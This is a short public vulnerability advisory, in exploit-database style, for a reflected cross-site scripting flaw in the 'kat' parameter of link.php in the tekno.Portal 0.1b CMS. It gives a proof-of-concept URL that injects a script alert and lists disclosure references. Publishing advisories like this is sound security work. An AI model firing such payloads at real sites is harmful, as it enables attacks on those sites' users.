=====================================================================
    tekno.Portal v0.1b - Cross-Site Scripting Vulnerability in "link.php" 
    =====================================================================


____________________________________________________________________________________


# Exploit Title: tekno.Portal v0.1b - Cross-Site Scripting Vulnerability in "link.php" 

# Date: [09-25-2018]

# Category: Webapps
____________________________________________________________________________________


# Author: Socket_0x03 (Alvaro J. Gene)

# Email: Socket_0x03 (at) teraexe (dot) com

# Website: www.teraexe.com 

____________________________________________________________________________________


# Software Link: http://sourceforge.net/projects/teknoportal

# Vulnerable Application: tekno.Portal

# Version: 0.1b

# File: link.php

# Parameter: kat

# Language: This application is available only in turkish language.

# Product Description: Tekno.Portal is a content management system (CMS) developed 
in PHP; furthermore, a webmaster can use this application to manage files, store
data, and more. 

____________________________________________________________________________________


#  Cross-Site Scripting Vulnerability: 

http://www.website.com/teknoportal/link.php?kat=<"Test">[XSS]

# XSS Example: 

http://www.website.com/teknoportal/link.php?kat=<"Test"><script>alert(23)</script>

____________________________________________________________________________________




# References:

https://seclists.org/bugtraq/2018/Sep/71
https://cxsecurity.com/issue/WLB-2018090252
https://packetstormsecurity.com/files/149566/tekno.Portal-0.1b-Cross-Site-Scripting.html